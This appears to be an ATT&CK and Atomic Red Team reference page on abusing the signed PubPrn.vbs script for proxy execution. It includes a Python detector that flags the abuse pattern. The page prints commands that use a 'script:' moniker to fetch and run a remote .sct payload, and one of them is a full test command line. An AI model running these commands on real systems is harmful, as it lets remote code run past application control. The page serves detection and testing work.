T1216.001
Signed Script Proxy Execution: Pubprn
Description from ATT&CK
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via `Cscript.exe`. For example, the following code publishes a printer within the specified domain: `cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com`. (Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites. (Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second `script:` parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is `pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct`. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), `PubPrn.vbs` has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to `LDAP://`, vice the `script:` moniker which could be used to reference remote code via HTTP(S).
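A detection sketch for the behavior described above, added here as an example and not taken from ATT&CK or Atomic Red Team: it classifies the second PubPrn parameter found in process-creation command lines. The function names, verdict labels and the `inventory.vbs` sample line are constructed for illustration; the other two sample lines reuse commands quoted on this page.

```python
import re
from ntpath import basename  # Windows path rules on any host OS

# A token is a run of non-space characters and/or double-quoted segments.
TOKEN = re.compile(r'(?:[^\s"]+|"[^"]*")+')

def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [t.replace('"', '') for t in TOKEN.findall(cmdline)]

def classify_pubprn(cmdline):
    """Return None if PubPrn is not invoked, else a verdict on its second parameter."""
    tokens = tokenize(cmdline)
    idx = next((i for i, t in enumerate(tokens)
                if basename(t).lower() in ("pubprn.vbs", "pubprn")), None)
    if idx is None:
        return None
    # Script-host switches such as //nologo may follow the script name; skip them.
    args = [t for t in tokens[idx + 1:] if not t.startswith("//")]
    if len(args) < 2:
        return "incomplete"
    second = args[1].lower()
    if second.startswith("ldap://"):
        return "expected"        # the form the updated script restricts to
    if second.startswith("script:"):
        return "script-moniker"  # the abuse pattern described above
    return "unexpected"

def scan(cmdlines):
    """Return (verdict, line) for every PubPrn call that is not the expected LDAP form."""
    hits = []
    for line in cmdlines:
        verdict = classify_pubprn(line)
        if verdict not in (None, "expected"):
            hits.append((verdict, line))
    return hits

# Sample process-creation command lines (constructed for this example).
SAMPLES = [
    r'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs '
    r'localhost "script:https://mydomain.com/folder/file.sct"',
    'cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com',
    r'cscript.exe //nologo C:\scripts\inventory.vbs',
]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLES):
        print(f"[{verdict}] {line}")
```

Matching is by script file name only, so a renamed copy of the script will not be seen by this check.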
Atomic Tests
Atomic Test #1: PubPrn.vbs Signed Script Bypass
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
Supported Platforms: Windows
auto_generated_guid: 9dd29a1f-1e16-4862-be83-913b10a88f6c
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| remote_payload | A remote payload to execute using PubPrn.vbs. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct |
Attack Commands: Run with command_prompt!
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"

Atomic test(s) for this technique last updated: 2023-02-13 23:10:37 UTC